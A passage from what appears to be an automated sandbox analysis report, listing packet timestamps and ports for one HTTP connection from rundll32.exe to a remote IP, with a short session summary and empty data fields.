May 25, 2022 11:27:27.337759972 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337789059 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337822914 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337835073 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337841034 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337861061 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337869883 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337889910 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337902069 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337922096 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337946892 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337950945 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.337955952 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.337976933 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338004112 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338010073 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338032961 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338037014 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338063002 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338067055 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338088036 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338113070 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338114023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338125944 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338145971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338174105 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.338200092 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.338282108 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342243910 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342287064 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342312098 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342333078 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.342334986 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342350006 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342351913 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.342397928 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.345252991 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345288992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345314980 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345331907 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345349073 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345366001 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.345438004 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.345510006 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346698046 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346730947 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346755028 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346777916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346795082 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346807957 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346816063 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346836090 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346839905 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346863985 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346888065 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346889019 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346894026 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346910000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346926928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346934080 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346937895 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346965075 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.348109007 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348145008 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348167896 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348184109 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348210096 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.348242044 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350125074 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350157022 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350179911 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350200891 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350215912 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350236893 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350258112 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350263119 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350275993 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350280046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350282907 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350305080 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350310087 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350336075 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350358963 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350359917 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350364923 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350377083 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350403070 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350406885 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353005886 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353033066 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353053093 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353074074 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353087902 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353118896 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353135109 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353837967 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353864908 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353885889 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353905916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353924990 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353950024 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353957891 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.354001999 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.354005098 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.354027987 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.354042053 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.354085922 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355632067 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355663061 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355688095 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355710983 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355732918 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355742931 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355758905 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355784893 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355789900 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355794907 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355803013 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355818987 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355829000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355854034 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355878115 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355880022 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355885029 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355902910 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355922937 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355927944 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355928898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355954885 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355978012 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355978966 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355983973 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356004953 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356021881 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356040955 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356044054 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356056929 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356066942 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356089115 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356103897 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356110096 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356117010 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356132984 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356152058 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356167078 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356169939 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356173038 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356178045 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356192112 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356205940 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356209040 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356231928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356245995 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356251955 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356256008 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356278896 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356298923 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356314898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356333971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356336117 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356340885 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356353045 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356374025 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356389046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356394053 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356395960 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356398106 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356416941 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356437922 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356446028 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356451988 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356460094 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356488943 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356493950 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356502056 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356503010 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356525898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356540918 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356559992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356581926 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356604099 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356611967 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356616020 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356626034 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356648922 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356653929 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356657028 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356672049 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356693029 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356693983 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356697083 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356718063 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356739044 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356753111 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356782913 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356787920 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356791019 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357369900 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357399940 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357431889 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357453108 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357475042 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357496023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357505083 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357518911 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357542992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357558966 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357559919 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357563972 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357567072 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357588053 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.360047102 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.360075951 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.360094070 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.360229015 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363274097 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363343000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363362074 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363379955 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363399982 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363425016 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363450050 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363473892 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363481998 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363492012 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363497019 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363516092 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363547087 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363554001 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363888025 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:28.182548046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:28.200694084 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:28.475930929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:28.475972891 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:28.476161957 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:28:32.470417976 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49771 | 176.10.119.68 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 25, 2022 11:27:26.119944096 CEST | 1245 | OUT | |
May 25, 2022 11:27:26.411830902 CEST | 1246 | IN |